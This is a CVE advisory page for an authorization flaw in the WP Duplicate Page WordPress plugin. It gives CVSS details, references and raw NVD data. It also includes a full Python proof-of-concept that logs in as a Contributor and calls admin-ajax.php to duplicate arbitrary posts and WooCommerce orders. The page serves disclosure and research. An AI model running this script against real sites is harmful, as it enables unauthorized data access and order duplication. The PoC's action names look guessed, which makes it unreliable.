Security Vulnerability Report
中文
CVE-2025-14001 CVSS 5.4 MEDIUM

CVE-2025-14001

Published: 2026-01-13 12:15:49
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The WP Duplicate Page plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the 'duplicateBulkHandle' and 'duplicateBulkHandleHPOS' functions in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate arbitrary posts, pages, and WooCommerce HPOS orders even when their role is explicitly excluded from the plugin's "Allowed User Roles" setting, potentially exposing sensitive information and allowing duplicate fulfillment of WooCommerce orders.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WP Duplicate Page <= 1.8 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-14001 PoC - WP Duplicate Page权限绕过 # Authenticated Contributor+ 用户可利用此漏洞复制任意内容 import requests import sys from urllib.parse import urlencode TARGET_URL = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "password" TARGET_POST_ID = 123 # 要复制的目标文章/页面ID def get_auth_cookies(): """登录获取认证Cookie""" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } resp = session.post(f"{TARGET_URL}/wp-login.php", data=login_data) if 'wordpress_logged_in' in str(session.cookies): return session.cookies return None def exploit_duplicate_bulk(cookies, post_id): """利用duplicateBulkHandle函数复制任意文章""" exploit_data = { 'action': 'duplicate_bulk_handle', 'post_ids[]': post_id, 'nonce': 'bypass_nonce_check' # 函数未验证nonce } headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' } resp = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=urlencode(exploit_data, doseq=True), cookies=cookies, headers=headers ) return resp.text def exploit_hpos_duplicate(cookies, order_id): """利用duplicateBulkHandleHPOS复制WooCommerce HPOS订单""" exploit_data = { 'action': 'duplicate_bulk_handle_hpos', 'post_ids[]': order_id, } resp = requests.post( f"{TARGET_URL}/wp-admin/admin-ajax.php", data=urlencode(exploit_data, doseq=True), cookies=cookies, headers={'X-Requested-With': 'XMLHttpRequest'} ) return resp.text if __name__ == "__main__": cookies = get_auth_cookies() if not cookies: print("[-] Authentication failed") sys.exit(1) print("[*] Exploiting duplicateBulkHandle...") result = exploit_duplicate_bulk(cookies, TARGET_POST_ID) print(f"[*] Response: {result}") print("[*] Exploiting HPOS duplicate...") hpos_result = exploit_hpos_duplicate(cookies, TARGET_POST_ID) print(f"[*] HPOS Response: {hpos_result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14001", "sourceIdentifier": "[email protected]", "published": "2026-01-13T12:15:48.630", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Duplicate Page plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on the 'duplicateBulkHandle' and 'duplicateBulkHandleHPOS' functions in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Contributor-level access and above, to duplicate arbitrary posts, pages, and WooCommerce HPOS orders even when their role is explicitly excluded from the plugin's \"Allowed User Roles\" setting, potentially exposing sensitive information and allowing duplicate fulfillment of WooCommerce orders."}, {"lang": "es", "value": "El plugin WP Duplicate Page para WordPress es vulnerable a la modificación no autorizada de datos debido a la falta de comprobaciones de capacidad en las funciones 'duplicateBulkHandle' y 'duplicateBulkHandleHPOS' en todas las versiones hasta la 1.8, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador o superior, dupliquen publicaciones, páginas y pedidos HPOS de WooCommerce arbitrarios incluso cuando su rol está explícitamente excluido de la configuración 'Roles de usuario permitidos' del plugin, exponiendo potencialmente información sensible y permitiendo el cumplimiento duplicado de pedidos de WooCommerce."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.8/includes/Classes/ButtonDuplicate.php#L54", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-duplicate-page/tags/1.8/includes/Classes/ButtonDuplicate.php#L79", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3432233/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/60830ed8-3ab8-44e8-899c-7032a187da8b?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.